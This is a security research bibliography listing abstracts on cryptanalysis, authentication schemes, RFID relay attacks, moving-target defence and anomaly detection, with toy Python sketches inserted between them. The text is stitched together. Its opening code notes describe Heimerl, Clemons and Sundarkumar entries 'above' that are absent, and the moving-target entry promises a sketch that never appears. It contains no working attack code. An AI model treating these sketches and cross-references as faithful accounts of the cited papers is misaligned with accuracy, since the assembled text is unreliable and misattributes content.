  • V.S. Subrahmanian, Handbook of Computational Approaches to Counterterrorism, Springer Publishing Company, 2013. (ID#:14-1458) Citation available at: http://dl.acm.org/citation.cfm?id=2430713&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 This article invites individuals focused on counter-terrorism in research, academia, and industry to consider the advances in understanding terrorist groups that information technology has allowed. The particular focus of this article is the use of text analytics to anticipate terror group behavior, understand terror networks, and create defensive policies. This work explores the role of mathematics and modern computing as significant contributors to the study of terrorist organizations and groups.
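
The starting point for the Word Cloud Explorer in the Heimerl et al. entry above is distilling text to its most frequent words. That step is sketched below with Python's collections.Counter and an invented stop-word list; the paper's system layers NLP and interaction on top:

    import re
    from collections import Counter

    STOPWORDS = {"the", "a", "of", "to", "and", "in", "is", "for"}   # tiny sample list

    def cloud_weights(text, top=5):
        """Most frequent non-stopword terms: the word sizes of a cloud."""
        words = re.findall(r"[a-z']+", text.lower())
        return Counter(w for w in words if w not in STOPWORDS).most_common(top)

    sample = "Security of security science is the science of securing security."
    print(cloud_weights(sample))   # [('security', 3), ('science', 2), ('securing', 1)]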
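
The Clemons et al. entry above designs counting hash tables whose second hash gives updates a data-placement property suited to flash. The in-memory toy below keeps only the counting-plus-placement idea: a placement hash routes each term's counter to a "block" standing in for a flash page, so updates cluster instead of landing randomly. It is a simplification, not the paper's design:

    from collections import defaultdict

    NUM_BLOCKS = 8   # stand-in for flash pages

    def block_of(term):
        """Placement hash: decides which 'page' holds a term's counter."""
        return hash(term) % NUM_BLOCKS

    blocks = [defaultdict(int) for _ in range(NUM_BLOCKS)]

    def count(term):
        blocks[block_of(term)][term] += 1   # writes cluster by block

    for t in "to be or not to be".split():
        count(t)

    print(blocks[block_of("to")]["to"])     # -> 2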
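
The Sundarkumar and Ravi entry above vectorizes API-call sequences with text mining before classifying them. A skeletal version of that pipeline, with fabricated toy traces and labels, and omitting the study's mutual-information feature selection and over-sampling, can be written with scikit-learn:

    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.svm import SVC

    # Toy API-call traces (space-separated call names), entirely fabricated.
    traces = [
        "OpenProcess WriteProcessMemory CreateRemoteThread",   # malware-like
        "CreateFile ReadFile CloseHandle",                     # benign-like
        "OpenProcess VirtualAllocEx WriteProcessMemory",       # malware-like
        "RegOpenKey RegQueryValue RegCloseKey",                # benign-like
    ]
    labels = [1, 0, 1, 0]

    vec = TfidfVectorizer(token_pattern=r"\w+")   # each API name is one token
    X = vec.fit_transform(traces)

    clf = SVC(kernel="linear").fit(X, labels)
    test = vec.transform(["OpenProcess WriteProcessMemory CloseHandle"])
    print(clf.predict(test))                      # e.g. [1]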


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.



Weaknesses



Attackers need only find one or a few exploitable vulnerabilities to mount a successful attack, while defenders must shore up as many weaknesses as practicable. The research presented here covers a range of weaknesses and approaches for identifying and securing against attacks. Many articles focus on key systems, both public and private.

  • Peter Nose, "Security Weaknesses Of A Signature Scheme And Authenticated Key Agreement Protocols," Information Processing Letters, Volume 114 Issue 3, March, 2014, (Pages 107-115). (ID#:14-1491) Available at: http://dl.acm.org/citation.cfm?id=2564930.2565025&coll=DL&dl=GUIDE&CFID=341995912&CFTOKEN=88342782 or http://dx.doi.org/10.1016/j.ipl.2013.11.005 At ACISP 2012, a novel deterministic identity-based (aggregate) signature scheme was proposed that does not rely on bilinear pairing. The scheme was formally proven to be existentially unforgeable under an adaptive chosen message and identity attack. The security was proven under the strong RSA assumption in the random oracle model. In this paper, unfortunately, we show that the signature scheme is universally forgeable, i.e., an adversary can recover the private key of a user and use it to generate forged signatures on any messages of its choice having on average eight genuine signatures. This means, that realizing a deterministic identity-based signature scheme in composite order groups is still an open problem. In addition, we show that a preliminary version of the authenticated key exchange protocol proposed by Okamoto in his invited talk at ASIACRYPT 2007 is vulnerable to the key-compromise impersonation attack and therefore cannot be secure in the eCK model. We also show that the two-party identity-based key agreement protocol of Holbl et al. is vulnerable to the unknown key-share attack. Keywords: Aggregate signature, Cryptography, Deterministic signature, Identity-based, Key authentication, Two-party key agreement
  • Wenbo Shi, Debiao He, Shuhua Wu, "Cryptanalysis and Improvement Of A DoS-Resistant ID-Based Password Authentication Scheme Without Using Smart Card," International Journal of Information and Communication Technology, Volume 6 Issue 1, November 2014, (Pages 39-48). (ID#:14-1492) Available at: http://dl.acm.org/citation.cfm?id=2576036.2576040&coll=DL&dl=GUIDE&CFID=341995912&CFTOKEN=88342782 or http://dx.doi.org/10.1504/IJICT.2014.057971 An authentication scheme allows the user and the server to authenticate each other and establish a session key for future communication in an open network. Very recently, Wen et al. proposed a DoS-resistant ID-based password authentication scheme without using smart card. They claimed that their scheme could overcome various attacks. However, in this paper, we will point out that Wen et al.'s scheme is vulnerable to an impersonation attack and a privileged insider attack. To overcome these weaknesses, we also propose an improved scheme. The analysis shows our scheme not only overcomes the weaknesses in Wen et al.'s scheme but also has better performance, making it more suitable for practical applications. Keywords: (not available)
  • Li, B., "Sustainable Value and Generativity in the Ecological Metadata Language (EML) Platform: Toward New Knowledge and Investigations," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.3533,3542, 6-9 Jan. 2014. (ID#:14-1493) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759042&isnumber=6758592 This paper examines Ecological Metadata Language (EML) as a generative platform facilitating new ecological research. It reflects on literature about the EML platform, and on the EML platform itself. First, it identifies a substantial gap in literature about use of the EML platform for intended research. Second, it identifies some strengths and weaknesses of the EML platform to support research about variance, process, and configurational theories. Third, it examines the EML platform's strengths and weaknesses in mediating values, particularly those concerning new kinds of ecological research envisioned in EML literature. Finally, it contributes some brief directions for future research, including: expanding notions of valuable (meta) data, of use and of users; articulating clear value; and exploring the morphology of (meta) data. Keywords: XML; data handling; ecology; environmental science computing; meta data; sustainable development; EML; EML platform; configurational theories; data morphology; ecological metadata language platform; ecological research; process theories; sustainable generativity; sustainable value; variance theories; Biological system modeling; Communities; Context; Environmental factors; Standards; Systematics; XML; Ecological Metadata Language; generativity; knowledge flows; metadata
  • Kushwaha, A.K.S.; Srivastava, R., "Performance Evaluation Of Various Moving Object Segmentation Techniques For Intelligent Video Surveillance System," Signal Processing and Integrated Networks (SPIN), 2014 International Conference on , vol., no., pp.196,201, 20-21 Feb. 2014. (ID#:14-1494) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6776947&isnumber=6776904 Moving object segmentation is an essential process for many computer vision algorithms. Many different methods have been proposed over the recent years, but experts can be confused about their benefits and limitations. In this paper, a review and comparative study of various moving object segmentation approaches is presented in terms of qualitative and quantitative performances, with the aim of pointing out their strengths and weaknesses and suggesting new research directions. For evaluation and analysis purposes, the various standard spatial domain methods include those proposed by McFarlane and Schofield [13], Kim et al [18], Oliver et al [27], Liu et al [9], Stauffer and Grimson's [15], Zivkovic [12], Lo and Velastin [25], Cucchiara et al. [26], Bradski [24], and Wren et al. [16]. For quantitative evaluation of these standard methods the various metrics used are RFAM (relative foreground area measure), MP (misclassification penalty), RPM (relative position based measure), and NCC (normalized cross correlation). The strengths and weaknesses of various segmentation approaches are discussed. From the results obtained, it is observed that the codebook based segmentation method performs better in comparison to other methods in consideration. Keywords: image classification; image motion analysis; image segmentation; video surveillance; MP; NCC; RFAM; RPM; codebook based segmentation; computer vision algorithms; intelligent video surveillance system; misclassification penalty; moving object segmentation; normalized cross correlation; performance evaluation; quantitative evaluation; relative foreground area measure; relative position based measure; standard methods; standard spatial domain methods; Adaptation models; Area measurement; Computational modeling; Image segmentation; Motion segmentation; Noise; Position measurement; Computer Vision; Motion Analysis; Object Segmentation
  • Jenq-Shiou Leu; Wen-Bin Hsieh, "Efficient And Secure Dynamic ID-Based Remote User Authentication Scheme For Distributed Systems Using Smart Cards," Information Security, IET , vol.8, no.2, pp.104,113, March 2014. (ID#:14-1495) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748544&isnumber=6748540 User authentication is a basic concern for distributed environments, and strong remote user authentication schemes are important to ensure security. This paper proposes an efficient and secure dynamic ID-based remote user authentication scheme for distributed systems using smart cards.
  • Berger, M.; Erlacher, F.; Sommer, C.; Dressler, F., "Adaptive Load Allocation For Combining Anomaly Detectors Using Controlled Skips," Computing, Networking and Communications (ICNC), 2014 International Conference on , vol., no., pp.792,796, 3-6 Feb. 2014. (ID#:14-1496) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6785438&isnumber=6785290 Traditional Intrusion Detection Systems (IDS) can be complemented by an Anomaly Detection Algorithm (ADA) to also identify unknown attacks. We argue that, as each ADA has its own strengths and weaknesses, it might be beneficial to rely on multiple ADAs to obtain deeper insights. ADAs are very resource intensive; thus, real-time detection with multiple algorithms is even more challenging in high-speed networks. To handle such high data rates, we developed a controlled load allocation scheme that adaptively allocates multiple ADAs on a multi-core system. The key idea of this concept is to utilize as many algorithms as possible without causing random packet drops, which is the typical system behavior in overload situations. We developed a proof of concept anomaly detection framework with a sample set of ADAs. Our experiments confirm that the detection performance can substantially benefit from using multiple algorithms and that the developed framework is also able to cope with high packet rates. Keywords: multiprocessing systems; real-time systems; resource allocation; security of data; ADA; IDS; adaptive load allocation; anomaly detection algorithm; controlled load allocation; controlled skips; high-speed networks; intrusion detection systems; multicore system; multiple algorithms; real-time detection; resource intensive; unknown attacks; High-speed networks; Intrusion detection; Probabilistic logic; Reliability; Uplink; World Wide Web
  • Okhravi, Hamed; Hobson, Thomas; Bigelow, David; Streilein, William, "Finding Focus in the Blur of Moving-Target Techniques," Security & Privacy, IEEE , vol.12, no.2, pp.16,26, Mar.-Apr. 2014. (ID#:14-1498) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6673500&isnumber=6798534 Protecting critical systems and assets against cyberattacks is an ever more difficult challenge that strongly favors attackers. Whereas defenders must protect a large, diverse set of cybersystems containing an unknown number of vulnerabilities of various types, attackers need only find one or a few exploitable vulnerabilities to mount a successful attack. One promising approach that can shift the balance in the defenders' favor is to create uncertainty for attackers by dynamically changing system properties in what is called a cyber moving target (MT). MT techniques seek to randomize system components to reduce the likelihood of a successful attack, add dynamics to a system to reduce the lifetime of an attack, and diversify otherwise homogeneous collections of systems to limit the damage of a large-scale attack. In this article, the authors review the five dominant domains of MT techniques available today as research prototypes and commercial solutions. They present the techniques' strengths and weaknesses and make recommendations for future research that will improve current capabilities. (A toy re-randomization sketch appears after this list.) Keywords: Computer crime; Computer security; Dynamic programming; IP networks; Network security; Ports (Computers); Runtime environment; Software engineering; Target tracking; ASLR; cyber moving target; dynamic data; dynamic network; dynamic platform; dynamic runtime environment; dynamic software; moving target; reconnaissance
  • Orman, H., "Recent Parables in Cryptography," Internet Computing, IEEE , vol.18, no.1, pp.82,86, Jan.-Feb. 2014. (ID#:14-1499) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6756867&isnumber=6756719 The annual CRYPTO conference held in August 2013 generated several discussions about developments in cryptography. The author notes that hash functions play an important role in cryptography by supplying a nearly unique number for any piece of data. The years since MD5's weaknesses became known have led to an unsettled feeling about how to design hash functions. Keywords: cryptography; CRYPTO conference; cryptography developments; hash functions; Cryptography; Internet; NIST; Network security; Diffie-Hellman; cryptography; malware
  • Ying He; Johnson, C.; Renaud, K.; Yu Lu; Jebriel, S., "An empirical study on the use of the Generic Security Template for structuring the lessons from information security incidents," Computer Science and Information Technology (CSIT), 2014 6th International Conference on , vol., no., pp.178,188, 26-27 March 2014. (ID#:14-1500) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6805998&isnumber=6805962 The number of security incidents is still increasing. The re-occurrence of past breaches shows that lessons have not been effectively learned across different organizations. This illustrates important weaknesses within information security management systems (ISMS). The sharing of recommendations between public and private organizations has, arguably, not been given enough attention across academia and industry. Many questions remain, for example, about appropriate levels of detail and abstraction that enable different organizations to learn from incidents that occur in other companies within the same or different industries. The Generic Security Template has been proposed, aiming to provide a unified way to share the lessons learned from real world security incidents. In particular, it adapts the graphical Goal Structuring Notation (GSN), to present lessons learned in a structured manner by mapping them to the security requirements of the ISMS. In this paper, we have shown how a Generic Security Template can be used to structure graphical overviews of specific incidents. We have also shown the template can be instantiated to communicate the findings from an investigation into the US VA data breach. Moreover, this paper has empirically evaluated this approach to the creation of a Generic Security Template; this provides users with an overview of the lessons derived from security incidents at a level of abstraction that can help to implement recommendations in future contexts that are different from those in which an attack originally took place. Keywords: security of data; GSN; ISMS; US VA data breach; generic security template; graphical goal structuring notation; information security management systems; private organizations; public organizations; security incidents; security requirements; Companies; Context; Hazards; Medical services; Security; Sensitivity; Standards; Generic Security Template; Goal Structuring Notation; lessons learned; security incident
  • Korak, Thomas; Hutter, Michael, "On the power of active relay attacks using custom-made proxies," RFID (IEEE RFID), 2014 IEEE International Conference on , vol., no., pp.126,133, 8-10 April 2014. (ID#:14-1501) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810722&isnumber=6810700 A huge number of security-relevant systems nowadays use contactless smart cards. Such systems, like payment systems or access control systems, commonly use single-pass or mutual authentication protocols to prove the origin of the card holder. The application of relay attacks allows circumventing this authentication process without needing to attack the implementation or protocol itself. Instead, the entire wireless communication is simply forwarded using a proxy and a mole, allowing relaying messages over a large distance. In this paper, we present several relay attacks on an ISO/IEC 14443-based smart card implementing an AES challenge-response protocol. We highlight the strengths and weaknesses of two different proxy types: an NFC smart phone and a dedicated custom-made proxy device. First, we propose a "three-phones-in-the-middle" attack that allows relaying the communication over more than 360 feet (110 meters). Second, we present a custom-made proxy that solves major relay-attack restrictions that apply on almost all NFC smart phones, for example, cloning of the victim's UID, adaption of low-level protocol parameters, direct request for Waiting Time Extensions, or active modifications of the messages. Finally, we propose an attack that allows inducing single bit faults during the anticollision of the card which forces the reader to re-send or temporarily stall the communication, which can be exploited by attacks to gain additional relay time. Keywords: IEC standards; ISO standards; Protocols; Radiofrequency identification; Relays; Smart phones; Wireless LAN; Embedded Systems; Man-in-the-Middle; Radio-Frequency Identification (RFID); Relay Attacks; Smart Cards
  • Fuw-Yi Yang; Chih-Wei Hsu; Su-Hui Chiu, "Password Authentication Scheme Preserving Identity Privacy," Measuring Technology and Mechatronics Automation (ICMTMA), 2014 Sixth International Conference on, pp.443-447, 10-11 Jan. 2014 (ID#:14-1502) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6802726&isnumber=6802614 Password-based authentication schemes have recently been used widely in network environments; they provide a convenient way for users to authenticate themselves to servers. Previously, Xu et al. proposed an improved smart-card-based password authentication scheme with provable security. Unfortunately, Song pointed out that their scheme cannot withstand impersonation attacks, and proposed two improved schemes to address the problem, but the first of these still cannot withstand impersonation attacks. In addition to analyzing the weakness of Song's scheme, this paper proposes an improved scheme that preserves identity privacy. Keywords: data privacy; smart cards; identity privacy preservation; impersonation attack; network environment; password authentication scheme; smart card; Authentication; Barium; Nickel; Privacy; Servers; Smart cards; identity authentication; identity privacy; impersonation attack; password guessing attacks; trapdoor function (A baseline password-verifier sketch appears after this list.)
  • Lin Ding; Chenhui Jin; Jie Guan; Qiuyan Wang, "Cryptanalysis of Lightweight WG-8 Stream Cipher," Information Forensics and Security, IEEE Transactions on, vol.9, no.4, pp.645-652, April 2014 (ID#:14-1503) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6746224&isnumber=6755552 WG-8 is a new lightweight variant of the well-known Welch-Gong (WG) stream cipher family; it takes an 80-bit secret key and an 80-bit initial vector (IV) as inputs. So far no attack on the WG-8 stream cipher has been published except the attacks by the designers. This paper shows that there exist Key-IV pairs for WG-8 that generate keystreams which are exact shifts of each other throughout the keystream generation. By exploiting this slide property, an effective key recovery attack on WG-8 in the related-key setting is proposed, with a time complexity of 2^53.32 and a requirement of 2^52 chosen IVs. The attack is minimal in the sense that it requires only one related key. Furthermore, we present an efficient key recovery attack on WG-8 in the multiple-related-key setting. As confirmed by experimental results, our attack recovers all 80 key bits of WG-8 on a PC with a 2.5-GHz Intel Pentium 4 processor. This is the first time a weakness has been presented for WG-8, assuming that the attacker can obtain only a few dozen consecutive keystream bits for each IV. Finally, we give a new Key/IV loading proposal for WG-8 that takes an 80-bit secret key and a 64-bit IV as inputs; the new proposal keeps the basic structure of WG-8 and provides enough resistance against our related-key attacks. Keywords: computational complexity; cryptography; microprocessor chips; 80-bit initial vector; 80-bit secret key; Intel Pentium 4 processor; Welch-Gong stream cipher; frequency 2.5 GHz; key recovery attack; keystream generation; lightweight WG-8 stream cipher cryptanalysis; related key attack; slide property; time complexity; Ciphers; Clocks; Equations; Proposals; Time complexity; Cryptanalysis; WG-8; lightweight stream cipher; related key attack (A toy slide-property sketch appears after this list.)
  • Ye, F.; Chakrabarty, K.; Zhang, Z.; Gu, X., "Information-Theoretic Framework for Evaluating and Guiding Board-Level Functional Fault Diagnosis," Design & Test, IEEE, vol.PP, no.99, pp.1-1, March 2014 (ID#:14-1504) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6777578&isnumber=6461917 Reasoning-based functional-fault diagnosis has recently been advocated for improving high-volume product yield and reducing manufacturing cost. Periodic evaluation and analysis can help locate weaknesses in a diagnosis system and thereby provide guidelines for redesigning the tests, which facilitates better diagnosis. We describe an information-theoretic framework for evaluating the effectiveness of, and providing guidance to, a reasoning-based functional fault diagnosis system. This framework measures the discriminative ability of syndromes and the ambiguity between root causes. Results are presented for three complex boards that are in volume production. Keywords: Accuracy; Databases; Fault diagnosis; Maintenance engineering; Manufacturing; Measurement; Redundancy (A toy mutual-information sketch appears after this list.)
  • Amalarethinam, D.I.G.; Geetha, J.S., "Enhancing Security Level for Public Key Cryptosystem Using MRGA," Computing and Communication Technologies (WCCCT), 2014 World Congress on, pp.98-102, Feb. 27, 2014-March 1, 2014 (ID#:14-1505) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6755114&isnumber=6755083 The efficiency of a cryptographic algorithm depends not only on the time taken for encryption and decryption but also on the number of levels used to derive the cipher text from the plain text. The public key cryptosystem RSA is one of the most widely used algorithms; however, several attacks have been introduced to break it by exploiting certain limitations, and it cannot be guaranteed that the cipher text is fully secure. One such limitation of past cryptosystems is the use of ASCII characters for the numerical representation of the text. To overcome this limitation, the Magic Rectangle Generation Algorithm (MRGA) is proposed in this work; it enhances security through the complexity it adds to the encryption process. The singly even magic rectangle is formed from a seed number, a start number, a row sum, and a column sum, and the values of the row sum and column sum are very difficult to trace. The proposed work thus introduces one more level of security into public key algorithms such as RSA and ElGamal, and helps to overcome a weakness of public key cryptosystems. Cipher text produced by this method is entirely different from the plain text and is suitable for secure transmission over the internet. Keywords: Internet; public key cryptography; ASCII characters; ElGamal; Internet; MRGA; RSA; cipher text; column sum; decryption; encryption process; innovative algorithm; magic rectangle generation algorithm; numerical representation; plain text; public key cryptosystem; row sum; security level enhancement; seed number; start number; Algorithm design and analysis; Ciphers; Encryption; Public key cryptography; MRGA; Magic Rectangle; Public Key Cryptosystem; RSA; Security; public key; secret key (A toy magic-square encoding sketch appears after this list.)
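
For the He et al. entry above: the Generic Security Template arranges lessons as a GSN argument tree of goals, strategies, and solutions mapped to ISMS requirements. The following is a minimal, illustrative sketch of such a tree in Python; the class and field names are assumptions made for this example, not the authors' tooling.

```python
# Minimal, illustrative sketch (not the authors' tool): a Goal Structuring
# Notation (GSN) tree that maps incident lessons to ISMS requirements.
from dataclasses import dataclass, field

@dataclass
class GsnNode:
    kind: str                     # "Goal", "Strategy", or "Solution"
    text: str                     # claim, argument step, or evidence
    children: list = field(default_factory=list)

def render(node: GsnNode, depth: int = 0) -> None:
    """Print the argument structure as an indented outline."""
    print("  " * depth + f"[{node.kind}] {node.text}")
    for child in node.children:
        render(child, depth + 1)

# A fragment one might instantiate for a data-breach lesson:
root = GsnNode("Goal", "Sensitive records are protected outside the office", [
    GsnNode("Strategy", "Argue over each applicable ISMS control", [
        GsnNode("Goal", "Portable devices holding records are encrypted", [
            GsnNode("Solution", "Incident finding: unencrypted laptop was stolen"),
        ]),
    ]),
])
render(root)
```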
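For the Korak and Hutter entry above: a relay attack works because the proxy/mole pair forwards protocol messages verbatim, so the cryptography alone cannot distinguish a relayed card from a present one. A minimal sketch follows, with HMAC-SHA256 standing in for the paper's AES challenge-response protocol; all names and timings are illustrative.

```python
# Minimal sketch of why a relay defeats challenge-response authentication:
# the proxy and mole forward messages unchanged, so the reader sees a
# cryptographically valid answer either way. HMAC-SHA256 stands in for AES.
import hashlib
import hmac
import os
import time

KEY = os.urandom(16)                 # shared between card and reader

def card_respond(challenge: bytes) -> bytes:
    """The genuine card computes a keyed response to the reader's challenge."""
    return hmac.new(KEY, challenge, hashlib.sha256).digest()

def relay(challenge: bytes, hop_delay_s: float = 0.005) -> bytes:
    """Proxy -> mole -> real card -> mole -> proxy, messages untouched."""
    time.sleep(hop_delay_s)          # forward the challenge to the far end
    response = card_respond(challenge)
    time.sleep(hop_delay_s)          # forward the response back
    return response

challenge = os.urandom(8)
assert relay(challenge) == card_respond(challenge)   # reader accepts it
# Only the added round-trip delay betrays the relay, which is why tight
# timing checks (distance bounding) are the usual countermeasure.
```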
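For the Yang, Hsu, and Chiu entry above: the paper's own scheme is not reproduced here, so the sketch below shows only the generic baseline that password schemes build on, a salted and iterated verifier that resists guessing attacks on a stolen table. Note that this baseline does nothing for identity privacy (the user's identity still travels with the login message), which is exactly the gap the paper targets.

```python
# Baseline sketch, not Song's or the authors' scheme: a salted, iterated
# password verifier. Iteration count and salt size are illustrative.
import hashlib
import hmac
import os

def enroll(password: str) -> tuple:
    """Store (salt, verifier) server-side instead of the raw password."""
    salt = os.urandom(16)
    verifier = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, verifier

def check(password: str, salt: bytes, verifier: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, verifier)   # constant-time compare

salt, verifier = enroll("correct horse")
assert check("correct horse", salt, verifier)
assert not check("wrong guess", salt, verifier)
```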
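For the Ding et al. entry above: the slide property means two related Key/IV loadings put the cipher into internal states that differ by t clockings of the same update function, so the resulting keystreams are exact t-bit shifts of each other. The toy below demonstrates the effect on an 8-bit LFSR rather than WG-8; the taps, register size, and shift amount are arbitrary choices for illustration.

```python
# Toy demonstration of the slide property (8-bit LFSR stand-in, not WG-8).
def clock(state: int) -> int:
    """One step of the state-update function."""
    bit = ((state >> 0) ^ (state >> 2) ^ (state >> 3) ^ (state >> 4)) & 1
    return (state >> 1) | (bit << 7)

def keystream(state: int, n: int) -> list:
    out = []
    for _ in range(n):
        out.append(state & 1)      # emit one keystream bit
        state = clock(state)       # advance the register
    return out

s0 = 0b10110001                    # stand-in for one Key/IV loading
slid = s0
for _ in range(5):                 # a "related" loading, 5 clocks ahead
    slid = clock(slid)

ks_a = keystream(s0, 40)
ks_b = keystream(slid, 40)
assert ks_a[5:] == ks_b[:35]       # keystream B is keystream A slid by 5
print("slide property confirmed")
```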
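For the Ye et al. entry above: one plausible way to score the "discriminative ability of syndromes" (an assumed formulation for illustration, not necessarily the authors' exact metric) is the mutual information between root causes and a syndrome's outcome, estimated from historical repair logs. A syndrome whose outcome splits the root causes cleanly carries close to one bit; a syndrome that fires the same way for every cause carries none.

```python
# Sketch: score a test syndrome by estimated mutual information
# I(root cause; syndrome outcome) over observed (cause, outcome) pairs.
from collections import Counter
from math import log2

def mutual_information(pairs: list) -> float:
    """pairs: list of (root_cause, syndrome_outcome) observations."""
    n = len(pairs)
    pxy = Counter(pairs)
    px = Counter(x for x, _ in pairs)
    py = Counter(y for _, y in pairs)
    return sum(c / n * log2((c / n) / ((px[x] / n) * (py[y] / n)))
               for (x, y), c in pxy.items())

# Toy repair log: syndrome S1 separates causes A/B well, S2 does not.
log_s1 = [("A", 1)] * 40 + [("B", 0)] * 40
log_s2 = [("A", 1)] * 40 + [("B", 1)] * 40
print(mutual_information(log_s1))   # ~1.0 bit: highly discriminative
print(mutual_information(log_s2))   # 0.0 bits: useless for diagnosis
```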
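For the Amalarethinam and Geetha entry above: the MRGA layer replaces raw ASCII codes with values drawn from a magic rectangle before the public-key step. The sketch below substitutes a hard-coded 4x4 magic square and a 16-symbol toy alphabet; the actual singly even rectangle construction from the secret seed, start, row-sum, and column-sum parameters is the paper's contribution and is omitted here.

```python
# Illustrative stand-in for MRGA pre-encoding: map characters to cells of
# a magic square instead of their ASCII codes before RSA/ElGamal encryption.
import string

MAGIC = [[ 1, 15, 14,  4],
         [12,  6,  7,  9],
         [ 8, 10, 11,  5],
         [13,  3,  2, 16]]
assert all(sum(row) == 34 for row in MAGIC)          # equal row sums
assert all(sum(col) == 34 for col in zip(*MAGIC))    # equal column sums

ALPHABET = string.ascii_uppercase[:16]   # toy 16-symbol alphabet
flat = [v for row in MAGIC for v in row]
ENC = {ch: v for ch, v in zip(ALPHABET, flat)}
DEC = {v: ch for ch, v in ENC.items()}

def encode(text: str) -> list:
    """Magic-square values, not ASCII codes, are what the cipher sees."""
    return [ENC[ch] for ch in text]

def decode(values: list) -> str:
    return "".join(DEC[v] for v in values)

msg = "FACED"                            # uses only the toy alphabet
assert decode(encode(msg)) == msg
print(encode(msg))
```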

